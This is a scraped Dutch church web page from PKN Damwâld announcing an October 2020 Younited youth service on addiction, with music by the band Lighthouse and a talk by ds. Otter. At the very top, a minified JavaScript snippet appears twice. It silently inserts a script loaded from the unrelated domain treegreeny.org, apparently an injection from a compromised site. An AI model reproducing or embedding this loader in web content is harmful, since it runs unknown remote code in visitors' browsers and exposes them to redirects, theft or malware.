;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited jeugdkerk .... Verslaafd aan ... 25 oktober ! - PKN Damwâld

Younited jeugdkerk …. Verslaafd aan … 25 oktober !

Gepubliceerd op: dinsdag 29 september 2020

Het zijn onzekere tijden, dat weten we allemaal wel. Ook met de groep van Younited hebben we het gehad over hoe we met (het organiseren van) onze diensten om moeten gaan. De laatste dienst was van 7 juni; dit was onze eerste volledig digitale dienst. Qua bereik mogen we zeker niet klagen: de teller staat inmiddels op 905! Dit betekent dat we via de digitale weg eigenlijk meer mensen hebben bereikt dan met een ‘normale’ Younited-dienst. Al met al aanleiding om op 25 oktober weer een Younited-dienst te verzorgen! En het leuke is dat er nu ook nog op de ouderwetse manier kerkgangers bij kunnen zijn!  De band Lighthouse de muzikale begeleiding gaat verzorgen. Samen met ds. Otter voor het verdiepende praatje hebben we een sterke bezetting!

We het hebben over verschillende verslavingen en komt er ervaringdeskundige zijn verhaal vertellen.  Er zijn veel verschillende verslavingen van shoppen en alcohol tot roken en eten. Ben je nu benieuwd naar de dienst? Kijk dan live via de site of kijk het terug op een later moment.

25 oktober, 19.30u via pkndamwald.nl/live